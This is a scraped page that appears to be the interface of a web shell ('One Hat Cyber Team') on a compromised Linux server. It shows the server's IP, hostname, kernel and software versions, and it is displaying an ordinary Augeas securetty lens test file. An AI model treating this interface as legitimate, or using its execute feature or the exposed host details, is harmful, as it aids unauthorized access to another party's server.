⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.13
Server IP:
109.199.105.153
Server:
Linux connect.inboxifs.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
augeas
/
lenses
/
dist
/
tests
/
View File Name :
test_securetty.aug
module Test_securetty = (* basic test *) let basic = "tty0\ntty1\ntty2\n" (* declare the lens to test and the resulting tree *) test Securetty.lns get basic = { "1" = "tty0" } { "2" = "tty1" } { "3" = "tty2" } (* complete test *) let complete = "# some comment tty0 # X11 display :0.0 console # allow root from console " (* declare the lens to test and the resulting tree *) test Securetty.lns get complete = { "#comment" = "some comment" } {} { "1" = "tty0" } { "#comment" = "X11 display" } { "2" = ":0.0" } {} { "3" = "console" { "#comment" = "allow root from console" } }